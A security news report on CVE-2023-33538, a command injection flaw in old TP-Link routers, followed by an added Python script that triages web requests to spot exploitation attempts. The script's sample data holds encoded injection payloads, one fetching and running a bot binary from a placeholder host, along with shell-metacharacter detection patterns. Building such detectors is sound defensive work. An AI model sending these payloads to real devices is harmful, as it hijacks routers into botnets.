CVE-2023-33538, a command injection flaw in outdated TP-Link routers, has been under attack for over a year, yet the exploitation attempts observed so far have been unsuccessful, according to security researchers. The flaw sits in the /userRpm/WlanNetworkRpm endpoint and affects models including the TL-WR940N v2/v4, TL-WR740N v1/v2 and TL-WR841N v8/v10. CISA added it to the Known Exploited Vulnerabilities (KEV) catalog in June 2025 and ordered federal agencies to remediate by 7 July 2025.
Disclosed in June 2023, the vulnerability lies in how the endpoint processes the ssid1 parameter: a crafted HTTP request can inject shell commands and achieve code execution on the device. Two factors limit the practical impact: the endpoint requires authentication, and the injected commands run in a limited BusyBox shell. According to Palo Alto Networks, its telemetry detected large-scale exploitation attempts around the time of the KEV addition, in which attackers tried to fetch a malicious arm7 binary from a remote server, mark it executable and run it.
The arm7 payload is a bot linked to Mirai-like activity; it communicates with a hard-coded C2 server at 51.38.137[.]113 and can distribute malware to other devices. In practice the observed attempts fell short on three counts: many were sent unauthenticated, many injected into the ssid parameter rather than the vulnerable ssid1, and the payload chain relied on wget, which is not present in the firmware's BusyBox environment.
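The three failure conditions above (no authentication, wrong parameter, wget missing from the target) are exactly what a defender wants a detection to report, since they separate noisy mass scanning from an attempt that could actually land. The following is an added example written for this page, not code from the article, Palo Alto Networks or TP-Link. It triages requests to /userRpm/WlanNetworkRpm by URL-decoding the query string, looking for shell metacharacters in ssid and ssid1, and attaching the reasons an attempt is unlikely to work. The JSON sensor record format, the `authenticated` field and every sample line are constructed for the example; the IP addresses in the samples are RFC 5737 documentation ranges, not the real C2.

```python
"""Triage HTTP requests aimed at the TP-Link /userRpm/WlanNetworkRpm endpoint.

Added example, not code from the original article, Palo Alto Networks or TP-Link.
It encodes the article's observations: the injectable parameter is ssid1, the
endpoint requires authentication, and the firmware's BusyBox lacks wget, so an
attempt that hits ssid, arrives unauthenticated, or depends on wget is unlikely
to succeed. The record format and all sample lines are constructed; a real
deployment would map its own sensor fields onto them.
"""
import json
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/userRpm/WlanNetworkRpm"
SSID_PARAMS = ("ssid", "ssid1")
# Characters that terminate or chain shell commands; legitimate SSIDs rarely
# contain them, so their presence in an SSID value is a strong signal.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# The fetch -> chmod -> execute chain the article describes.
FETCH_CHAIN = re.compile(r"\bwget\b.*\bchmod\b.*\./", re.S)


def triage(record: str) -> Optional[dict]:
    """Return a finding for one JSON sensor record, or None if it is not relevant."""
    r = json.loads(record)
    parts = urlsplit(r["uri"])
    if parts.path.lower() != TARGET_PATH.lower():
        return None
    # parse_qs percent-decodes values, so %3B becomes ';' before we inspect it.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in SSID_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                hits[name] = value
    if not hits:
        return None
    payload = " ".join(hits.values())
    reasons = []
    if not r.get("authenticated", False):
        reasons.append("unauthenticated")          # endpoint requires a session
    if "ssid1" not in hits:
        reasons.append("wrong_parameter")          # ssid is not the injectable field
    if re.search(r"\bwget\b", payload):
        reasons.append("wget_absent_on_target")    # firmware BusyBox has no wget
    return {
        "src": r["src"],
        "params": sorted(hits),
        "fetch_chain": bool(FETCH_CHAIN.search(payload)),
        "verdict": "likely_effective" if not reasons else "unlikely_effective",
        "reasons": reasons,
    }


def triage_all(records) -> list:
    """Run triage over many records and keep only the findings."""
    return [f for f in (triage(rec) for rec in records) if f is not None]


# Constructed sample records (hypothetical sensor format, documentation IPs).
SAMPLE_RECORDS = [
    # benign SSID change by an authenticated admin
    '{"src": "192.0.2.10", "authenticated": true, '
    '"uri": "/userRpm/WlanNetworkRpm?ssid1=HomeNet%20Guest&channel=6"}',
    # mass-scan shape from the article: unauthenticated, hits ssid, relies on wget
    '{"src": "198.51.100.7", "authenticated": false, '
    '"uri": "/userRpm/WlanNetworkRpm?ssid=x%3Bwget%20http%3A%2F%2F203.0.113.10'
    '%2Farm7%3Bchmod%20%2Bx%20arm7%3B.%2Farm7"}',
    # attempt that meets the preconditions: authenticated, ssid1, no wget
    '{"src": "198.51.100.9", "authenticated": true, '
    '"uri": "/userRpm/WlanNetworkRpm?ssid1=x%60id%60"}',
    # unrelated endpoint
    '{"src": "192.0.2.11", "authenticated": true, "uri": "/userRpm/StatusRpm.htm"}',
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

Run against the constructed samples, the mass-scan record is reported as `unlikely_effective` with all three reasons and `fetch_chain` set, while the authenticated ssid1 record with no wget is the only `likely_effective` finding; the benign configuration change and the unrelated endpoint produce nothing. The `reasons` list is what lets a SOC deprioritise the flood of scanner traffic while still paging on the rare request that satisfies every precondition.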